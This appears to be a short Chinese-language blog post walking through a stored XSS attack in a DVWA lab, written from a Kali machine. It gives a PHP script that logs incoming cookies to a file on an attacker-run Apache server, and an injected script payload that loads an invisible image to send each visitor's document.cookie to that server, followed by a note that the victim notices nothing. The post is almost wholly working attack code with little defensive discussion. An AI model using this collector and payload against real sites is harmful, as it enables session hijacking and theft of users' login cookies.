1.准备接受cookie的服务器
服务器启动apache
root@kali:~# systemctl start apache2
/var/www/html/下创建一个文件cookie_rec.php
root@kali:~# vim /var/www/html/cookie_rec.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
修改文件夹权限,一会要生成txt文件
root@kali:/var# chown -R www-data.www-data /var/www/
2.
植入XSS代码:
<script>document.write('<img src="http://192.168.204.132/cookie_rec.php?cookie='+document.cookie+'" width=0 height=0 >')</script>
在页面上加载一个看不见的图片,把cookie获取到传给接受cookie的服务器,参数传给接收服务器的cookie_rec.php,会生成一个保存cookie的文件
3.通过另一个windows虚拟机,登录dvwa,然后点击存储型的页面,用户感知不到,也看不见图片
此时查看接受服务器上,已经生成了保存cookie的文件
标签:XSS,存储,验证,kali,www,cookie,var,服务器 From: https://www.cnblogs.com/yitian395/p/16843852.html